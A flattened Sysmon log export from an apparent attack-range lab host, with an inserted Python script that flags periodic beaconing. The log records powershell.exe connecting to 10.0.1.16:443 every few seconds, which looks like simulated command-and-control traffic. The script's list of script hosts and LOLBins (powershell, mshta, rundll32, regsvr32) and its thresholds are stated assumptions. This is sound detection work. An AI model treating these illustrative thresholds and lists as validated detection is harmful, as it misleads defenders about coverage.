Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035083967Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:13.378{B81B27B7-4D8D-613A-2790-03000000C801}5596C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035083966Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:13.057{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8EE3297C044D931574AB92E1DFFE04D6,SHA256=62FF1572B07381F7BB5D2DAFE8C27D9BB96899C28121562698F1F155DF3A4818,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
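The export above interleaves Splunk Universal Forwarder housekeeping (Event ID 23 FileDelete of its own WinEventLog checkpoint files, Event ID 10 ProcessAccess from splunkd.exe to its helper processes) with a much smaller set of Event ID 3 NetworkConnect records. Among those, powershell.exe running as ATTACKRANGE\REED_SCHMIDT opens a fresh TCP connection to 10.0.1.16:443 roughly every five seconds (source ports 56537, 56540, 56542, 56544, 56546, 56548, 56550), while streamfwd.exe running as NT AUTHORITY\SYSTEM connects to 10.0.1.12:8000 on a similar cadence. The script below is an added example, not part of this log export and not Splunk or Sysmon code. It transcribes those EID 3 records into key/value form (the standard Sysmon EID 3 field names, which the flattened export drops), groups them by process, user and destination, measures how regular the inter-connection gaps are, and then uses process and account context to separate the PowerShell beacon from the equally periodic forwarder traffic. The thresholds, the script-host list and the service-account list are assumptions chosen for illustration.

```python
# Added example: periodicity triage over Sysmon Event ID 3 NetworkConnect
# records. Sample records are transcribed from the events on this page;
# thresholds and the SCRIPT_HOSTS / SERVICE_ACCOUNTS lists are assumptions.
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
STREAMFWD = (r"C:\Program Files\SplunkUniversalForwarder\etc\apps"
             r"\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe")
SPLUNKD = r"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"
SYSTEM = r"NT AUTHORITY\SYSTEM"
USER = r"ATTACKRANGE\REED_SCHMIDT"


def ev(utc, image, user, dst_ip, dst_port):
    """One Sysmon EID 3 record reduced to the fields this check needs."""
    return {"UtcTime": utc, "Image": image, "User": user,
            "DestinationIp": dst_ip, "DestinationPort": dst_port}


# Constructed sample: the EID 3 events visible in this stretch of the export.
# The export is ordered by EventRecordID, not UtcTime, so the order here is
# only approximately chronological; interval_stats() sorts before measuring.
SAMPLE_EVENTS = [
    ev("2021-09-09 18:08:18.481", PS, USER, "10.0.1.16", 443),
    ev("2021-09-09 18:08:19.079", STREAMFWD, SYSTEM, "10.0.1.12", 8000),
    ev("2021-09-09 18:08:20.762", SPLUNKD, SYSTEM, "10.0.1.12", 8089),
    ev("2021-09-09 18:08:23.501", PS, USER, "10.0.1.16", 443),
    ev("2021-09-09 18:08:24.177", STREAMFWD, SYSTEM, "10.0.1.12", 8000),
    ev("2021-09-09 18:08:28.514", PS, USER, "10.0.1.16", 443),
    ev("2021-09-09 18:08:30.144", STREAMFWD, SYSTEM, "10.0.1.12", 8000),
    ev("2021-09-09 18:08:34.527", PS, USER, "10.0.1.16", 443),
    ev("2021-09-09 18:08:36.156", STREAMFWD, SYSTEM, "10.0.1.12", 8000),
    ev("2021-09-09 18:08:38.539", PS, USER, "10.0.1.16", 443),
    ev("2021-09-09 18:08:41.254", STREAMFWD, SYSTEM, "10.0.1.12", 8000),
    ev("2021-09-09 18:08:44.553", PS, USER, "10.0.1.16", 443),
    ev("2021-09-09 18:08:47.218", STREAMFWD, SYSTEM, "10.0.1.12", 8000),
    ev("2021-09-09 18:08:48.566", PS, USER, "10.0.1.16", 443),
]

# Assumed context lists: accounts that legitimately run always-on agents, and
# interpreters/LOLBins that rarely have a reason to beacon on their own.
SERVICE_ACCOUNTS = {r"NT AUTHORITY\SYSTEM", r"NT AUTHORITY\LOCAL SERVICE",
                    r"NT AUTHORITY\NETWORK SERVICE"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cscript.exe", "wscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}


def flow_key(event):
    return (event["Image"], event["User"],
            event["DestinationIp"], event["DestinationPort"])


def group_flows(events):
    """Bucket connection times by (Image, User, DestinationIp, DestinationPort)."""
    flows = defaultdict(list)
    for e in events:
        ts = datetime.strptime(e["UtcTime"], "%Y-%m-%d %H:%M:%S.%f")
        flows[flow_key(e)].append(ts)
    return flows


def interval_stats(timestamps):
    """Mean, population stdev and coefficient of variation (stdev/mean) of the
    gaps between consecutive connections; None with fewer than three events."""
    ts = sorted(timestamps)
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    if len(gaps) < 2:
        return None
    m, sd = mean(gaps), pstdev(gaps)
    return {"connections": len(ts), "mean_s": m, "stdev_s": sd, "cv": sd / m}


def triage(events, min_connections=5, max_cv=0.25):
    """Flag flows whose gaps are regular (low cv), then raise severity when the
    source is a script host or the account is not a service account."""
    findings = []
    for (image, user, dst_ip, dst_port), ts in group_flows(events).items():
        stats = interval_stats(ts)
        if (stats is None or stats["connections"] < min_connections
                or stats["cv"] > max_cv):
            continue
        basename = image.rsplit("\\", 1)[-1].lower()
        score, reasons = 1, [f"{stats['connections']} connections every "
                             f"~{stats['mean_s']:.1f}s (cv={stats['cv']:.2f})"]
        if basename in SCRIPT_HOSTS:
            score, reasons = score + 1, reasons + [f"script host {basename}"]
        if user not in SERVICE_ACCOUNTS:
            score, reasons = score + 1, reasons + [f"non-service account {user}"]
        findings.append({"image": basename, "user": user, "score": score,
                         "destination": f"{dst_ip}:{dst_port}",
                         "severity": {1: "low", 2: "medium", 3: "high"}[score],
                         "reasons": reasons})
    return sorted(findings, key=lambda f: -f["score"])


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f['severity'].upper():6} {f['image']} as {f['user']} -> "
              f"{f['destination']} | " + "; ".join(f["reasons"]))
```

Run as-is, it reports the powershell.exe flow to 10.0.1.16:443 as high (periodic, script host, interactive account) and the streamfwd.exe flow to 10.0.1.12:8000 as low (periodic, but a SYSTEM service binary talking to the Splunk indexer); the single splunkd.exe connection to 10.0.1.12:8089 yields no statistics and is skipped. Two caveats when turning this into a real detection: Sysmon's DestinationPortName ("https") is a port-number lookup, not protocol inspection, so nothing here proves the 443 traffic is TLS; and Event ID 3 carries no byte counts or durations, so pair it with proxy or flow data before calling a periodic flow a beacon. Separately, the trailing `false - insufficient disk space` on the Event ID 23 records above is Sysmon's Archived field: the deleted checkpoint files were not copied to the archive directory, so on this host FileDelete gives you the hash of a deleted file but not its contents.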
354300x800000000000000035083988Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:38.539{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56546-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083987Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:14.593{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B9B22E89EC0B38C66F9D09BD071D0B42,SHA256=2FB36CEE425F07EB002356561488FC84C695060EEEAED6A929BFC8A01903D28D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083986Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:14.593{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=19124203914F4A0C5ED1DA982351D5C1,SHA256=782D265AC0292C599F9A5F8E826DC8771DCEBCBF09526607FE23F2B464739D06,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035083985Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:14.093{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4D8E-613A-2890-03000000C801}2756C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000035083984Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:14.093{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083983Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:14.093{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083982Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:08:14.093{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083981Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:14.093{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083980Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:08:14.093{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4D8E-613A-2890-03000000C801}2756C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035083979Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:14.093{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4D8E-613A-2890-03000000C801}2756C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035083978Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:14.079{B81B27B7-4D8E-613A-2890-03000000C801}2756C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084059Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:43.639{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084058Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:08:43.639{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084057Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:43.639{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084056Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:08:43.639{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084055Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:43.639{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4DAB-613A-2B90-03000000C801}6520C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084054Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:43.639{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4DAB-613A-2B90-03000000C801}6520C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084053Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:43.633{B81B27B7-4DAB-613A-2B90-03000000C801}6520C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035084052Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:43.638{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7377E066625F29DF685B8A803AFCEA15,SHA256=DE9583BA7A545752E42F7F463397245FBB6A29CDBC1E520BF585ED690F80AFAA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000035084075Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:44.869{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE856B5584E62090D9014D338B6901B5,SHA256=6C5ABE3777B6FDFAF8FC1088E3A2AAB971F83DFEFD780243AA41331D4CA47E7B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084074Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:44.654{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A00BAD51F897F575B73E3E680C1A97F8,SHA256=5FA527F34F9DD76BFA4AD64D2A100511664B1746B24398B1F30C66D7A557024A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084073Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:44.654{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0070B1EAFD684E02B2D57D7A2F8A9EAE,SHA256=DC76E3FC6CB056A669D8AA8707ACDB89973C82977033798A74A007345CC555DA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084072Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:44.469{B81B27B7-4DAC-613A-2C90-03000000C801}61804580C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program 
